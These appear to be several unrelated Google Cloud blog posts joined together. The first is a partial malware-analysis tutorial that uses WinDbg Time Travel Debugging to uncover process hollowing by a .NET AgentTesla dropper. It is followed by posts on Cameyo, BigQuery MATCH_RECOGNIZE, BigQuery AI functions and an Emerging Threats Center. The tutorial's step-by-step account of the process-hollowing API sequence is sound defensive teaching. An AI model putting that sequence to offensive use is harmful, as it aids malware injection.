Copyright (C) Microsoft Corporation. All rights reserved.
Launching '0b631f91f02ca9cffd66e7c64ee11a4b.bin'
Initializing the recording of process (PID:2448) on trace file: C:\Users\FLARE\Desktop\0b631f91f02ca9cffd66e7c64ee11a4b02.run
Recording has started of process (PID:2448) on trace file: C:\Users\FLARE\Desktop\0b631f91f02ca9cffd66e7c64ee11a4b02.run
Once TTD begins recording, the trace concludes in one of two ways. First, the tracing automatically stops upon the malware’s termination (e.g., process exit, unhandled exception, etc.). Second, the user can manually intervene. While recording, TTD.exe displays a small dialog (shown in figure 2) with two control options:
Tracing Off: Stops the trace and detaches from the process, allowing the program to continue execution.
Exit App: Stops the trace and also terminates the process.
Figure 2: TTD trace execution control dialog
Recording a TTD trace produces the following files:
<trace>.run: The trace file is a proprietary format that contains compressed execution data. The size of a trace file is influenced by the size of the program, the length of execution, and other external factors such as the number of additional resources that are loaded.
<trace>.idx: The index file allows the debugger to quickly locate specific points in time during the trace, bypassing sequential scans of the entire trace. The index file is created automatically the first time a trace file is opened in WinDbg. In general, Microsoft suggests that index files are typically twice the size of the trace file.
<trace>.out: The trace log file containing logs produced during trace recording.
Once a trace is complete, the .run file can be opened with WinDbg.
Triaging the TTD Trace: Shifting Focus to Data
The fundamental advantage of TTD is the ability to shift focus from manual code stepping to execution data analysis. Performing rapid, effective triage with this data-driven approach requires proficiency in both basic TTD navigation and querying the Debugger Data Model. Let’s begin by exploring the basics of navigation and the Debugger Data Model.
Navigating a Trace
Basic navigation commands are available under the Home tab in the WinDbg UI.
Figure 3: Basic WinDbg TTD Navigation Commands
The standard WinDbg commands and shortcuts for controlling execution are g (Go), gu (Step Out), t (Step Into), and p (Step Over).
Replaying a TTD trace enables the reverse flow control commands that complement these regular flow control commands. Each reverse flow control complement is formed by appending a dash (-) to the regular flow control command:
g-: Go Back – Execute the trace backwards
g-u: Step Out Back – Execute the trace backwards up to the last call instruction
t-: Step Into Back – Single step into backwards
p-: Step Over Back – Single step over backwards
Time Travel (!tt) Command
While basic navigation commands let you move step-by-step through a trace, the time travel command (!tt) enables precise navigation to a specific trace position. These positions are often provided in the output of various TTD commands. A position in a TTD trace is represented by two hexadecimal numbers in the format #:# (e.g., E:7D5) where:
The first part is a sequencing number typically corresponding to a major execution event, such as a module load or an exception.
The second part is a step count, indicating the number of events or instructions executed since that major execution event.
We’ll use the time travel command later in this post to jump directly to the critical events in our process hollowing example, bypassing manual instruction tracing entirely.
The TTD Debugger Data Model
The WinDbg debugger data model is an extensible object model that exposes debugger information as a navigable tree of objects. The debugger data model brings a fundamental shift in how users access debugger information in WinDbg, from wrangling raw text-based output to interacting with structured object information. The data model supports LINQ for querying and filtering, allowing users to efficiently sort through large volumes of execution information. The debugger data model also simplifies automation through JavaScript, with APIs that mirror how you access the debugger data model through commands.
The Display Debugger Object Model Expression (dx) command is the primary way to interact with the debugger data model from the command window in WinDbg. The model lends itself to discoverability – you can begin traversing through it by starting at the root Debugger object:
0:000> dx Debugger
Debugger
Sessions
Settings
State
Utility
LastEvent
The command output lists the five objects that are properties of the Debugger object. Note that the names in the output, which look like links, are marked up using the Debugger Markup Language (DML). DML enriches the output with links that execute related commands. Clicking on the Sessions object in the output executes the corresponding dx command to expand on that object.
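In this session, that corresponding command, at the default recursion depth, is presumably the following (output not reproduced here):

0:000> dx -r1 Debugger.Sessions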
The -r# argument specifies recursion up to # levels, with a default depth of one if not specified. For example, increasing the recursion to two levels in the previous command produces the following output:
0:000> dx -r2 Debugger.Sessions
Debugger.Sessions
[0x0] : Time Travel Debugging: 0b631f91f02ca9cffd66e7c64ee11a4b.run
Processes
Id : 0
Diagnostics
TTD
OS
Devices
Attributes
The -g argument displays any iterable object as a data grid in which each element is a grid row and the child properties of each element are grid columns.
0:000> dx -g Debugger.Sessions
Figure 4: Grid view of Sessions, with truncated columns
Debugger and User Variables
WinDbg provides some predefined debugger variables for convenience which can be listed through the DebuggerVariables property.
@$cursession: The current debugger session. Equivalent to Debugger.Sessions[<session>]. Commonly used items include:
@$cursession.Processes: List of processes in the session.
@$cursession.TTD.Calls: Method to query calls that occurred during the trace.
@$cursession.TTD.Memory: Method to query memory operations that occurred during the trace.
@$curprocess: The current process. Equivalent to @$cursession.Processes[<pid>]. Frequently used items include:
@$curprocess.Modules: List of currently loaded modules.
@$curprocess.TTD.Events: List of events that occurred during the trace.
Investigating the Debugger Data Model to Identify Process Hollowing
With a basic understanding of TTD concepts and a trace ready for investigation, we can now look for evidence of process hollowing. To begin, the Calls method can be used to search for specific Windows API calls. This search is effective even with a .NET sample because the managed code must interface with the unmanaged Windows API through P/Invoke to perform a technique like process hollowing.
Process hollowing begins with the creation of a process in a suspended state via a call to CreateProcess with a creation flag value of 0x4. The following query uses the Calls method to return a table of each call to the kernel32 module’s CreateProcess* in the trace; the wildcard (*) ensures the query matches calls to either CreateProcessA or CreateProcessW.
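In its minimal form, before narrowing the output columns, that query likely looks like the following (the -g flag renders the results as a grid):

0:000> dx -g @$cursession.TTD.Calls("kernel32!CreateProcess*")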
This query returns a number of fields, not all of which are helpful for our investigation. To address this, we can apply the Select LINQ query to the original query, which allows us to specify which columns to display and rename them.
0:000> dx -g @$cursession.TTD.Calls("kernel32!CreateProcess*").Select(c => new { TimeStart = c.TimeStart, Function = c.Function, Parameters = c.Parameters, ReturnAddress = c.ReturnAddress})
The result shows one call to CreateProcessA starting at position 58243:104D. Note the return address: since this is a .NET binary, the native code executed by the Just-In-Time (JIT) compiler won’t be located in the application’s main image address space (as it would be in a non-.NET image). Normally, an effective triage step is to filter results with a Where LINQ query, limiting the return address to the primary module to filter out API calls that do not originate from the malware. This Where filter, however, is less reliable when analyzing JIT-compiled code due to the dynamic nature of its execution space.
The next point of interest is the Parameters field. Clicking on the DML link on the collapsed value {..} displays Parameters via a corresponding dx command.
Function arguments are available under a specific Calls object as an array of values. However, before we investigate the parameters, there are some assumptions made by TTD that are worth exploring. Overall, these assumptions are affected by whether the process is 32-bit or 64-bit. An easy way to check the bitness of the process is by inspecting the DebuggerInformation object.
0:000> dx Debugger.State.DebuggerInformation
Debugger.State.DebuggerInformation
ProcessorTarget : X86 <--- Process Bitness
Bitness : 32
EngineFilePath : C:\Program Files\WindowsApps\<SNIPPED>\x86\dbgeng.dll
EngineVersion : 10.0.27871.1001
The key identifier in the output is ProcessorTarget: this value indicates the architecture of the guest process that was traced, regardless of whether the host operating system running the debugger is 64-bit.
TTD uses symbol information provided in a program database (PDB) file to determine the number of parameters, their types and the return type of a function. However, this information is only available if the PDB file contains private symbols. While Microsoft provides PDB files for many of its libraries, these are often public symbols and therefore lack the necessary function information to interpret the parameters correctly. This is where TTD makes another assumption that can lead to incorrect results. Primarily, it assumes a maximum of four QWORD parameters and that the return value is also a QWORD. This assumption creates a mismatch in a 32-bit process (x86), where arguments are typically 32-bit (4-byte) values passed on the stack. Although TTD correctly finds the arguments on the stack, it misinterprets two adjacent 32-bit arguments as a single, 64-bit value.
One way to resolve this is to manually investigate the arguments on the stack. First we use the !tt command to navigate to the beginning of the relevant call to CreateProcessA.
0:000> !tt 58243:104D
(b48.12a4): Break instruction exception - code 80000003 (first/second chance not available)
Time Travel Position: 58243:104D
eax=00bed5c0 ebx=039599a8 ecx=00000000 edx=75d25160 esi=00000000 edi=03331228
eip=75d25160 esp=0055de14 ebp=0055df30 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
KERNEL32!CreateProcessA:
75d25160 8bff mov edi,edi
The return address is at the top of the stack at the start of a function call, so the following dd command skips over this value by adding an offset of 4 to the ESP register to properly align the function arguments.
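The command takes a form like the one below; its output, which lists the ten DWORD-sized arguments passed to CreateProcessA, is omitted here:

0:000> dd esp+4 LA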
The value of 0x4 (CREATE_SUSPENDED) set in the bitmask for the dwCreationFlags argument (6th argument) indicates that the process will be created in a suspended state.
The following command dereferences esp+4 via the poi operator to retrieve the application name string pointer then uses the da command to display the ASCII string.
0:000> da poi(esp+4)
0055de74 "C:WindowsMicrosoft.NETFramewo"
0055de94 "rkv4.0.30319InstallUtil.exe"
The command reveals that the target application is InstallUtil.exe, which aligns with the findings from basic analysis.
It is also useful to retrieve the handle to the newly created process in order to identify subsequent operations performed on it. The handle value is returned through a pointer (0x55e068 in the earlier referenced output) to a PROCESS_INFORMATION structure passed as the last argument. This structure has the following definition:
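// PROCESS_INFORMATION as defined in the Windows SDK (processthreadsapi.h)
typedef struct _PROCESS_INFORMATION {
    HANDLE hProcess;
    HANDLE hThread;
    DWORD  dwProcessId;
    DWORD  dwThreadId;
} PROCESS_INFORMATION, *PPROCESS_INFORMATION, *LPPROCESS_INFORMATION;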
After the call to CreateProcessA, the first member of this structure should be populated with the handle to the process. Step out of the call using the gu (Go Up) command to examine the populated structure.
0:000> gu
Time Travel Position: 58296:60D
0:000> dd /c 1 0x55e068 L4
0055e068 00000104 <-- handle to process
0055e06c 00000970
0055e070 00000d2c
0055e074 00001c30
In this trace, CreateProcess returned 0x104 as the handle for the suspended process.
The most interesting operation in process hollowing for the purpose of triage is the allocation of memory and subsequent writes to that memory, commonly performed via calls to WriteProcessMemory. The previous Calls query can be updated to identify calls to WriteProcessMemory.
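Assuming the same Select projection as before, the updated query likely resembles:

0:000> dx -g @$cursession.TTD.Calls("kernel32!WriteProcessMemory*").Select(c => new { TimeStart = c.TimeStart, Function = c.Function, Parameters = c.Parameters, ReturnAddress = c.ReturnAddress})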
Investigating these calls to WriteProcessMemory shows that the target process handle is 0x104, which represents the suspended process. The second argument defines the address in the target process. The arguments to these calls reveal a pattern common to PE loading: the malware writes the PE header followed by the relevant sections at their virtual offsets.
It is worth noting that the memory of the target process cannot be analyzed from this trace. To record the execution of a child process, pass the -children flag to the TTD.exe utility. This will generate a trace file for each process, including all child processes, spawned during execution.
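For example, re-recording the sample with child-process tracing enabled would look something like this:

C:\Users\FLARE\Desktop> ttd.exe -children 0b631f91f02ca9cffd66e7c64ee11a4b.bin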
The first memory write to what is likely the target process’s base address (0x400000) is 0x200 bytes. This size is consistent with a PE header, and examining the source buffer (0x9810af0) confirms its contents.
The !dh extension can be used to parse this header information.
0:000> !dh 0x9810af0
File Type: EXECUTABLE IMAGE
FILE HEADER VALUES
14C machine (i386)
3 number of sections
66220A8D time date stamp Fri Apr 19 06:09:17 2024
----- SNIPPED -----
OPTIONAL HEADER VALUES
10B magic #
11.00 linker version
----- SNIPPED -----
0 [ 0] address [size] of Export Directory
3D3D4 [ 57] address [size] of Import Directory
----- SNIPPED -----
0 [ 0] address [size] of Delay Import Directory
2008 [ 48] address [size] of COR20 Header Directory
SECTION HEADER #1
.text name
3B434 virtual size
2000 virtual address
3B600 size of raw data
200 file pointer to raw data
----- SNIPPED -----
SECTION HEADER #2
.rsrc name
546 virtual size
3E000 virtual address
600 size of raw data
3B800 file pointer to raw data
----- SNIPPED -----
SECTION HEADER #3
.reloc name
C virtual size
40000 virtual address
200 size of raw data
3BE00 file pointer to raw data
----- SNIPPED -----
The presence of a COR20 header directory (a pointer to the .NET header) indicates that this is a .NET executable. The relative virtual addresses for the .text (0x2000), .rsrc (0x3E000), and .reloc (0x40000) sections also align with the target addresses of the WriteProcessMemory calls.
The newly discovered PE file can now be extracted from memory using the .writemem command.
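For example, the 0x200-byte header at the source buffer could be dumped with a command along these lines (the output file name is illustrative):

0:000> .writemem C:\Users\FLARE\Desktop\stage_pe_header.bin 0x9810af0 L200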
Using a hex editor, the file can be reconstructed by placing each section at its raw offset. A quick analysis of the resulting .NET executable (SHA256: 4dfe67a8f1751ce0c29f7f44295e6028ad83bb8b3a7e85f84d6e251a0d7e3076) in dnSpy reveals its configuration data.
This case study demonstrates the benefit of treating TTD execution traces as a searchable database. By capturing the payload delivery and directly querying the Debugger Data Model for specific API calls, we quickly bypassed the multi-layered obfuscation of the .NET dropper. The combination of targeted data model queries and LINQ filters (for CreateProcess* and WriteProcessMemory*) and low-level commands (!dh, .writemem) allowed us to isolate and extract the hidden AgentTesla payload, yielding critical configuration details in a matter of minutes.
The tools and environment used in this analysis—including the latest version of WinDbg and TTD—are readily available via the FLARE-VM installation script. We encourage you to streamline your analysis workflow with this pre-configured environment.
While 90% of IT leaders indicate that the future of their end user computing (EUC) strategy is web-based, those same leaders admit that 50% of the applications their organizations rely on today are still legacy client-based apps.1 Similarly, IT leaders note that enabling end users to take advantage of AI on the endpoint is their top priority in the next 12 months. Clearly, something needs to bridge the gap between today’s reality and tomorrow’s strategy.
Announcing Cameyo by Google: Virtual app delivery for the modern tech stack
To provide today’s organizations with a more modern approach to virtualization, we are thrilled to launch Cameyo by Google, bringing a best-in-class Virtual App Delivery (VAD) solution into the Google enterprise family of products.
Cameyo is not VDI. It is a modern alternative designed specifically to solve the legacy app gap without the overhead of traditional virtual desktops. Instead of streaming a full, resource-heavy desktop, Cameyo’s Virtual App Delivery (VAD) technology delivers only the applications users need, securely to any device.
With Cameyo, those legacy Windows or Linux apps can either be streamed in the browser or delivered as Progressive Web Apps (PWAs) to give users the feel of using a native app in its own window. This allows users to run critical legacy applications — everything from specialized ERP clients, Windows-based design programs like AutoCAD, the desktop version of Excel, and everything in between — and access them alongside their other modern web apps in the browser, or access them side-by-side with the other apps in their system tray as PWAs. For the user, the experience is seamless and free from the context-switching of managing a separate virtual desktop environment. For IT, the complexity is eliminated.
“The beauty of Cameyo is its simplicity. It lets users access applications on any device with security built in, allowing us to reach any end user, on any device, without it ever touching our corporate systems or the complexity or overhead — no VPNs or firewall configurations needed,” said Phil Paterson, Head of Cloud & Infrastructure, PTSG. He added, “VPNs were taking up to 15 minutes to log in, but with Cameyo access is instant, saving users upwards of 30 minutes every day.”
Completing the Google Enterprise stack
Today’s enterprises have been increasingly turning to Google for a modern, flexible, and secure enterprise tech stack that was built for the web-based future of work, not modified for it. And Cameyo by Google is a critical unlock mechanism that bridges the gap between those organizations’ legacy investments and this modern stack.
Google’s enterprise tech stack provides organizations with a flexible, modular path to modernization. Unlike all-or-nothing enterprise ecosystems, Google’s enterprise stack doesn’t force you to abandon existing investments for the sake of modernization. Instead, it gives you the freedom to modernize individual layers of your stack at your own pace, as it makes sense for your business — all while maintaining access to your existing technology investments. And Google’s flexible enterprise stack is built for interoperability with a broad ecosystem of modern technologies built for the web, giving you freedom along your modernization journey.
A secure browsing first: Cameyo + Chrome Enterprise
Speaking of enabling organizations to modernize at their own rate, we’ve seen a distinct pattern popping up throughout our conversations with enterprises today. And that pattern is the interest in migrating to Secure Enterprise Browsers (SEBs) to provide a more secure, manageable place for people to do their best work.
And while the market for SEBs is growing rapidly, most enterprise browser solutions share a fundamental blind spot: they are only built to secure web-based SaaS applications. They have no direct answer for the 50% of client-based applications that run entirely outside the browser.1
This is where the combination of Cameyo by Google and Chrome Enterprise Premium provides a unique solution. This combination is the only solution on the market that delivers and secures both modern web apps and legacy client-based apps within a single, unified browser experience.
Here’s how it works:
Chrome Enterprise Premium serves as the secure entry point, providing advanced threat protection, URL filtering, and granular Data Loss Prevention (DLP) controls – like preventing copy/paste or printing – for all sensitive data and web activity.
Cameyo takes your legacy client apps (like your ERP, an internal accounting program, SAP client, etc.) and publishes them within that managed Chrome Enterprise browser.
This unifies the digital workspace. Those legacy applications, which previously lived on a desktop, now run under the single security context of the secure browser. This allows Chrome Enterprise Premium’s advanced security and DLP controls to govern applications they previously couldn’t see, providing a comprehensive security posture across all of your organization’s apps, not just the web-based apps.
Bringing AI to legacy apps. The combination of Cameyo and Chrome Enterprise not only brings all your apps into a secure enterprise browser, but thanks to Gemini in Chrome, all of your legacy apps now have the power of AI layered on top.
Unlocking adoption of a more secure, web-based OS and more collaborative, web-first productivity
Moving all of your apps to the web with Cameyo doesn’t just provide a more unified user experience. It can also provide a significantly better, more flexible, and more secure experience for IT. Compared to traditional virtualization technologies that take weeks or months to deploy, IT can publish their first apps to users within hours, and be fully deployed in days. All while taking advantage of Cameyo’s embedded Zero Trust security model for ultra-secure app delivery.
And that added simplicity, flexibility, and security opens up other opportunities for IT, too.
For organizations that have been looking for a more secure alternative to Windows in the wake of years of security incidents, outages, and forced upgrades to the next Windows version, Cameyo now makes it possible for IT to migrate to ChromeOS — including the use of ChromeOS Flex to convert existing PCs to ChromeOS — while maintaining access to all of their Windows apps.
For years, the primary blocker for deeper enterprise adoption of ChromeOS has always been the “app gap” — the persistent need to access a few remaining Windows applications within an organization. Cameyo eliminates this blocker entirely, enabling organizations to confidently migrate their entire fleet to ChromeOS, the only operating system with zero reported ransomware attacks, ever.
Similarly, Cameyo allows organizations to fully embrace Google Workspace while retaining access to essential client apps that previously kept them tethered to Microsoft™, such as legacy Excel versions with complex macros or specific ERP clients. Now, teams can move to a more modern, collaborative productivity suite that was built for the web, and they can still access any specialized Windows apps that their workflows still depend on.
Your flexible path to modernization starts now
For too long, legacy applications have hindered organizations’ modernization efforts. But the age of tolerating complex, costly virtualization solutions just to keep legacy apps alive is coming to an end.
Cameyo by Google, like the rest of the Google enterprise stack, was built in the cloud specifically to enable the web-based future of work. And like the rest of Google’s enterprise offerings, Cameyo gives you a flexible path forward that enables you to build a modern, secure, and productive enterprise computing stack at the pace that works for you.
Identifying patterns and sequences within your data is crucial for gaining deeper insights. Whether you’re tracking user behavior, analyzing financial transactions, or monitoring sensor data, the ability to recognize specific sequences of events can unlock a wealth of information and actionable insights.
Imagine you’re a marketer at an e-commerce company trying to identify your most valuable customers by their purchasing trajectory. You know that customers who start with small orders and progress to mid-range purchases will usually end up becoming high-value purchasers and your most loyal segment. Having to figure out the complex SQL to aggregate and join this data could be quite the challenging task.
That’s why we’re excited to introduce MATCH_RECOGNIZE, a new feature in BigQuery that allows you to perform complex pattern matching on your data directly within your SQL queries!
What is MATCH_RECOGNIZE?
At its core, MATCH_RECOGNIZE is a tool built directly into GoogleSQL for identifying sequences of rows that match a specified pattern. It’s similar to using regular expressions, but instead of matching patterns in a string of text, you’re matching patterns in a sequence of rows within your tables. This capability is especially powerful for analyzing time-series data or any dataset where the order of rows is important.
With MATCH_RECOGNIZE, you can express complex patterns and define custom logic to analyze them, all within a single SQL clause. This reduces the need for cumbersome self-joins or complex procedural logic. It also lessens your reliance on Python to process data and will look familiar to users who have experience with Teradata’s nPath or other external MATCH_RECOGNIZE workloads (like Snowflake, Azure, Flink, etc.).
How it works
The MATCH_RECOGNIZE clause is highly structured and consists of several key components that work together to define your pattern-matching logic:
PARTITION BY: This clause divides your data into independent partitions, allowing you to perform pattern matching within each partition separately.
ORDER BY: Within each partition, ORDER BY sorts the rows to establish the sequence in which the pattern will be evaluated.
MEASURES: Here, you can define the columns that will be included in the output, often using aggregate functions to summarize the matched data.
PATTERN: This is the heart of the MATCH_RECOGNIZE clause, where you define the sequence of symbols that constitutes a match. You can use quantifiers like *, +, ?, and more to specify the number of occurrences for each symbol.
DEFINE: In this clause, you define the conditions that a row must meet to be classified as a particular symbol in your pattern.
Let’s look at a simple example. From our fictional scenario above, imagine you have a table of sales data, and as a marketing analyst, you want to identify customer purchase patterns where their spending starts low, increases to a mid-range, and then reaches a high level. With MATCH_RECOGNIZE, you could write a query like this:
SELECT *
FROM
  Example_Project.Example_Dataset.Sales
MATCH_RECOGNIZE (
  PARTITION BY customer
  ORDER BY sale_date
  MEASURES
    MATCH_NUMBER() AS match_number,
    ARRAY_AGG(STRUCT(MATCH_ROW_NUMBER() AS row, CLASSIFIER() AS symbol,
      product_category)) AS sales
  PATTERN (low+ mid+ high+)
  DEFINE
    low AS amount < 50,
    mid AS amount BETWEEN 50 AND 100,
    high AS amount > 100
);
In this example, we’re partitioning the data by customer and ordering it by sale_date. The PATTERN clause specifies that we’re looking for one or more “low” sales events, followed by one or more “mid” sales events, followed by one or more “high” sales events. The DEFINE clause then specifies the conditions for a sale to be considered “low”, “mid”, or “high”. The MEASURES clause decides how to summarize each match; here with match_number we are indexing each match starting from 1 and creating a ‘sales’ array that will track every match in order.
Below are example matched customers:
customer | match_number | sales.row | sales.symbol | sales.product_category
---------+--------------+-----------+--------------+-----------------------
Cust1    | 1            | 1         | low          | Books
         |              | 2         | low          | Clothing
         |              | 3         | mid          | Clothing
         |              | 4         | high         | Electronics
         |              | 5         | high         | Electronics
Cust2    | 2            | 1         | low          | Software
         |              | 2         | mid          | Books
         |              | 3         | high         | Clothing
This data highlights some sales trends and could offer insights for a market analyst to strategize conversion of lower-spending customers to higher-value sales based on these trends.
Use cases for MATCH_RECOGNIZE
The possibilities with MATCH_RECOGNIZE are vast. Here are just a few examples of how you can use this powerful feature:
Funnel analysis: Track user journeys on your website or app to identify common paths and drop-off points. For example, you could define a pattern for a successful conversion funnel (e.g., view_product -> add_to_cart -> purchase) and analyze how many users complete it (see the example query after this list).
Fraud detection: Identify suspicious patterns of transactions that might indicate fraudulent activity. For example, you could look for a pattern of multiple small transactions followed by a large one from a new account.
Financial analysis: Analyze stock market data to identify trends and patterns, such as a “W” or “V” shaped recovery.
Log analysis: Sift through application logs to find specific sequences of events that might indicate an error or a security threat.
Churn analysis: Identify patterns in your data that lead to customer churn and find actionable insights to reduce churn and improve customer sentiment.
Network monitoring: Identify a series of failed login attempts to track issues or potential threats.
Supply chain monitoring: Flag delays in a sequence of shipment events.
Sports analytics: Identify streaks or changes in output for different players / teams over games, such as winning or losing streaks, changes in starting lineups, etc.
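As a sketch of the funnel-analysis idea from the list above, assuming a hypothetical Events table with user_id, event_name, and event_time columns, the conversion pattern might be expressed as:

SELECT *
FROM Example_Project.Example_Dataset.Events
MATCH_RECOGNIZE (
  PARTITION BY user_id
  ORDER BY event_time
  MEASURES MATCH_NUMBER() AS funnel_match
  PATTERN (view_product add_to_cart purchase)
  DEFINE
    view_product AS event_name = 'view_product',
    add_to_cart AS event_name = 'add_to_cart',
    purchase AS event_name = 'purchase'
);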
Get started today
Ready to start using MATCH_RECOGNIZE in your own queries? The feature is now available to all BigQuery users! To learn more and dive deeper into the syntax and advanced capabilities, check out the official documentation and tutorial available on Colab, BigQuery, and GitHub.
MATCH_RECOGNIZE opens up a whole new world of possibilities for sequential analysis in BigQuery, and we can’t wait to see how you’ll use it to unlock deeper insights from your data.
For decades, SQL has been the universal language for data analysis, offering access to analytics on structured data. Large Language Models (LLMs) like Gemini now provide a path to nuanced insights from unstructured data such as text, images, and video. However, integrating LLMs into a standard SQL flow requires data movement and at least some prompt and parameter tuning to optimize result quality. This is expensive to perform at scale, which keeps these capabilities out of reach for many data practitioners.

Today, we are excited to announce the public preview of BigQuery-managed AI functions, a new set of capabilities that reimagine SQL for the AI era. These functions — AI.IF, AI.CLASSIFY, and AI.SCORE — allow you to use generative AI for common analytical tasks directly within your SQL queries, no complex prompt tuning or new tools required. These functions have been optimized for their target use cases and do not require you to choose models or tune their parameters. Further, through intelligent optimizations on your provided prompt and query plans, we keep costs minimal. With these new functions, you can perform sophisticated AI-driven analysis using familiar SQL operators:
Filter and join data based on semantic meaning using AI.IF in a WHERE or ON clause.
Categorize unstructured text or images using AI.CLASSIFY in a GROUP BY clause.
Rank rows based on natural language criteria using AI.SCORE in an ORDER BY clause.
Together, these functions allow you to answer new kinds of questions that were previously out of reach for SQL analytics: for example, joining companies to news articles that mention them, even when an old or unofficial name is used.
Let’s dive deeper into how each of these functions works.
Function deep dive
AI.IF: Semantic filtering and joining
With AI.IF, you can filter or join data using conditions written in natural language. This is useful for tasks like identifying negative customer reviews, filtering images that have specific attributes, or finding relevant information in documents. BigQuery optimizes the query plan to reduce the number of calls to LLM by evaluating non-AI filters first. For example, the following query finds tech news articles from BBC that are related to Google.
SELECT title, body
FROM bigquery-public-data.bbc_news.fulltext
WHERE AI.IF(("The news is related to Google, news: ", body),
    connection_id => "us.test_connection")
  AND category = "tech"  -- Non-AI filter evaluated first
You can also use AI.IF() for powerful semantic joins, such as performing entity resolution between two different product catalogs. The following query finds products that are semantically identical, even if their names are not an exact match.
WITH product_catalog_A AS (SELECT "Veridia AquaSource Hydrating Shampoo" as product
  UNION ALL SELECT "Veridia Full-Lift Volumizing Shampoo"),
  product_catalog_B AS (SELECT "Veridia Shampoo, AquaSource Hydration" as product)
SELECT *
FROM product_catalog_A a JOIN product_catalog_B b
ON AI.IF((a.product, " is the same product as ", b.product),
  connection_id => "us.test_connection")
AI.CLASSIFY: Data classification
The AI.CLASSIFY function lets you categorize text or images based on labels you provide. You can use it to route support tickets by topic or classify images based on their style. For instance, you can classify news articles by topic and then count the number of articles in each category with a single query.
SELECT
  AI.CLASSIFY(
    body,
    categories => ['tech', 'sport', 'business', 'politics', 'entertainment'],
    connection_id => 'us.test_connection') AS category,
  COUNT(*) num_articles
FROM bigquery-public-data.bbc_news.fulltext
GROUP BY category;
AI.SCORE: Semantic ranking
You can use AI.SCORE to rank rows based on natural language criteria. This is powerful for ranking items based on a rubric. To give you consistent and high-quality results, BigQuery automatically refines your prompt into a structured scoring rubric. This example finds the top 10 most positive reviews for a movie of your choosing.
SELECT
  review,
  AI.SCORE(("From 1 to 10, rate how much does the reviewer like the movie: ", review),
    connection_id => 'us.test_connection') AS ai_rating,
  reviewer_rating AS human_rating,
FROM bigquery-public-data.imdb.reviews
WHERE title = 'Movie'
ORDER BY ai_rating DESC
LIMIT 10;
Built-in optimizations
These functions allow you to easily mix AI processing with common SQL operators like WHERE, JOIN, ORDER BY, and GROUP BY. BigQuery handles prompt optimization, model selection, and model parameter tuning for you.
Prompt optimization: LLMs are sensitive to the wording of a prompt; the same question can be expressed in different ways, which affects quality and consistency. BigQuery optimizes your prompts into a structured format specifically for Gemini, helping to ensure higher-quality results and an improved cache hit rate.
Query plan optimization: Running generative AI models over millions of rows can be slow and expensive. The BigQuery query planner reorders AI functions in your filters and pulls AI functions out of joins to reduce the number of calls to the model, which saves costs and improves performance.
Model endpoint and parameter tuning: BigQuery tunes the model endpoint and model parameters to improve both result quality and consistency across query runs.
Get started
The new managed AI functions — AI.IF(), AI.SCORE(), and AI.CLASSIFY() — complement the existing general-purpose Gemini inference functions in BigQuery, such as AI.GENERATE. In addition to the optimizations discussed above, you can expect further optimizations and mixed query processing between BigQuery and Gemini for even better price-performance. You can register your interest in early access here.
What to use and when: When your use case fits them, start with the managed AI functions, as they are optimized for cost and quality. Use the AI.GENERATE family of functions when you need control over your prompt and input parameters, and want to choose from a wide range of supported models for LLM inference.
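As a point of comparison, here is a minimal sketch of calling AI.GENERATE from Python through the BigQuery client. The connection ID and endpoint are placeholders, and the exact AI.GENERATE argument list should be verified against the current documentation.

from google.cloud import bigquery

client = bigquery.Client()  # assumes default project and credentials

# Placeholder connection and endpoint; AI.GENERATE gives you full control over
# the prompt and model choice, unlike the managed functions above.
rows = client.query("""
    SELECT
      title,
      AI.GENERATE(
        ('Summarize this article in one sentence: ', body),
        connection_id => 'us.test_connection',
        endpoint => 'gemini-2.5-flash').result AS summary
    FROM `bigquery-public-data.bbc_news.fulltext`
    LIMIT 5
""").result()

for row in rows:
    print(row.title, '->', row.summary)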
To learn more, refer to our documentation. The new managed AI functions are also available in BigQuery DataFrames. See this notebook and documentation for Python examples.
When a major vulnerability makes headlines, CISOs want to know fast if their organization is impacted and prepared. Getting the correct answer is often a time-consuming and human-intensive process that can take days or weeks, leaving open a dangerous window of unknown exposure.
To help close that gap, today we're introducing the Emerging Threats Center in Google Security Operations. Available now to licensed customers, this new capability can help solve the core, practical problem of scaling detection engineering, and help transform how teams operationalize threat intelligence.
Enabled by Gemini, our detection-engineering agent responds to new threat campaigns detected by Google Threat Intelligence, drawing on frontline insights from Mandiant, VirusTotal, and across Google. It generates representative events, assesses coverage, and closes detection gaps.
The Emerging Threats Center can help you understand if you are impacted by critical threat campaigns, and provides detection coverage to help ensure you are protected going forward.
Introducing campaign-based prioritization with emerging threats
Protecting against new threats has long been a manual, reactive cycle. It begins with threat analysts poring over reports to identify new campaign activity, which they then translate into indicators of compromise (IOCs) for detection engineers. Next, the engineering team manually authors, tests, and deploys the new detections.
Too often, we hear from customers and security operations teams that this labor-intensive process leaves organizations swimming upstream. It was “hard to derive clear action from threat intelligence data,” according to 59% of IT and cybersecurity leaders surveyed in this year’s Threat Intelligence Benchmark, a commissioned study conducted by Forrester Consulting on behalf of Google Cloud.
By sifting through volumes of threat intelligence data, the Emerging Threats Center can help security teams surface the most relevant threat campaigns to an organization — and take proactive action against them.
Instead of starting in a traditional alert queue, analysts now have a single view of threats that pose the greatest risks to their specific environment. This view includes details on the presence of IOCs in event data and detection rules.
For example, when a new zero-day vulnerability emerges, analysts don’t have to manually cross-reference blog posts with their alert queue. They can immediately see the campaign, the IOCs already contextualized against their own environment, and the specific detection rules to apply. This holistic approach can help them proactively hunt for the most time-sensitive threats before a major breach occurs.
Making all this possible is Gemini in Security Operations, transforming how we engineer detections. By ingesting a continuous stream of frontline threat intelligence, it can automatically test our detection corpus against new threats. When a gap is found, Gemini generates a new, fully-vetted detection rule for an analyst to approve. This systematic, automated workflow can help ensure you are protected from the latest threats.
Our campaign-based approach can provide definitive answers to the two most critical questions a security team faces during a major threat event: How are we affected, and how well are we prepared?
How are we affected?
The first priority is to understand your exposure. The Emerging Threats Center can help you find active and past threats in your environment by correlating campaign intelligence against your data in two ways:
IOC matches: It automatically searches for and prioritizes campaign-related IOCs across the previous 12 months of your security telemetry.
Detection matches: It instantly surfaces hits from curated detection rules that have been mapped directly to the specific threat campaign.
Both matches provide a definitive starting point for your investigative workflow.
Emerging Threat Center Feed View
How are we prepared?
The Emerging Threats Center can also help prove that you are protected moving forward. This capability can provide immediate assurance of your defensive posture by helping you confirm two key facts:
That you have no current or past IOC or detection hits related to the campaign.
That you have the relevant, campaign-specific detections active and ready to stop malicious activity if it appears.
Emerging Threat Center Campaign Detail View
Under the hood: The detection engineering engine
The Emerging Threats Center is built on a resilient, automated system that uses Gemini models and AI agents to drastically shorten the detection engineering lifecycle.
